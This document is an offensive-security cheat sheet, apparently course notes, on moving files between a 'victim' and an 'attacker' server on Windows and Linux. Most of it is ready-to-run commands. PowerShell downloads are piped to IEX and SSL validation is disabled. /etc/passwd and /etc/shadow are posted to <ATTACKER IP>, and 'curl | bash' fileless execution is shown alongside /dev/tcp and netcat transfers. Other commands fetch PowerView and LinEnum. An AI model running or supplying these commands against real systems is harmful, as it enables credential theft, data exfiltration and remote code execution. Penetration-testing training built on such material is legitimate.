File Transfers

How to transfer files between the victim and attacker servers

Windows File Transfer Methods

PowerShell Download

Using Net.WebClient and DownloadFile method

PS C:\user> (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

PS C:\user> (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')

Using Invoke-WebRequest

PS C:\user> Invoke-WebRequest '<Target File URL>' -OutFile '<Output File Name>' -UseBasicParsing | IEX

Bypassing SSL error

PS C:\user> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

PowerShell Upload

On the attacker server, run an upload server

$ python3 -m uploadserver

On the victim server, upload files to the server

PS C:\user> Invoke-FileUpload -Uri http://<ATTACKER IP>/upload -File <TARGET FILE>

Upload by converting to Base64

PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path <TARGET FILE> -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://<ATTACKER IP>/ -Method POST -Body $b64

SMB Download

Create a SMB folder on the attacker server

$ sudo impacket-smbserver share -smb2support /tmp/smbshare

On the victim, download files from the attacker server

C:\user> copy \\<ATTACKER IP>\share\nc.exe

If Windows requires a user and password set on the SMB server, set those up

$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Mount the drive on the victim

C:\user> net use n: \\<ATTACKER IP>\share /user:test test

SMB Upload

When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

Setup a SMB over HTTP server using WebDav on the attacker server

$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Upload files from the victim server to the attacker server

C:\user> copy <TARGET FILE> \\<ATTACKER IP>\DavWWWRoot\

FTP Download

Host FTP on the attacker server

$ sudo python3 -m pyftpdlib --port 21

Download files from the victim machine

PS C:\user> (New-Object Net.WebClient).DownloadFile('ftp://<ATTACKER IP>/file.txt', 'ftp-file.txt')

Non-Interactive FTP download

C:\user> echo open 192.168.49.128 > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo GET file.txt >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye

C:\user>more file.txt
This is a test file

FTP Uploads

Run an FTP server on the attacker machine

$ sudo python3 -m pyftpdlib --port 21 --write

Upload files from the victim machine

PS C:\user> (New-Object Net.WebClient).UploadFile('ftp://<ATTACKER IP>/ftp-hosts', '<TARGET FILE>')

Non-Interactive FTP upload

C:\user> echo open <ATTACKER IP> > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo PUT <TARGET FILE> >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open <ATTACKER IP>

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT <TARGET FILE>
ftp> bye

Linux File Transfer Methods

Network Downloads

$ wget https://<ATTACKER IP>/file -O /tmp/file

$ curl -o /tmp/LinEnum.sh https://<ATTACKER IP>/file

Network Uploads

On the attacker server, run an upload server

$ python3 -m pip install --user uploadserver # install uploadserver
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create a self-signed cert
$ python3 -m uploadserver 443 --server-certificate /root/server.pem # start server

On the victim, upload files to the server. We need to specify insecure because we are using a self-signed cert

$ curl -X POST https://<ATTACKER IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Fileless attacks

$ curl https://<ATTACKER IP>/script.sh | bash

$ wget -q0- https://<ATTACKER IP>/pythonfile | python3

Bash Downloads

Only works if Bash v 2.04 or greater is compiled with --enable-net-redirections

$ exec 3<>/dev/tcp/10.10.10.32/80 # Connect to the target server
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 # GET request
$ cat <&3 # print response

SSH/SCP Download

$ scp <ATTACKER USER>@<ATTCKER IP>:/file . 

SSH/SCP Uploads

$ scp /etc/passwd <ATTACKER USER>@<ATTACKER IP>:/ 

Web Servers in other languages

$ python3 -m http.server
$ php -S 0.0.0.0:8000
$ ruby -run -ehttpd . -p8000

Transferring Files with Code

Python

$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://attacker/file", "outputfilename")'

$ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://attacker/file", "outputfilename")'

PHP

php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

php -r 'const BUFFER = 1024; $fremote = 
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby

$ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

$ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

Javascript + cscript

Save the following code as `wget.js`

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Execute `wget.js` using powershell

> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript + cscript

Save the following code as `wget.vbs`

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Execute `wget.vbs` using powershell

> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1

Misc Transfers

Nc

Victim machine ready to receive data and write to local server

$ nc -l -p 8000 > /dev/shm/evil

Attacker machine sending file over

$ nc 192.168.49.128 8000 < evil

Doing the same but over an allowed port 443

$ sudo nc -l -p 443 -q 0 < /dev/shm/evil

$ nc 192.168.49.128 443 > evil

RDP

$ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

$ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer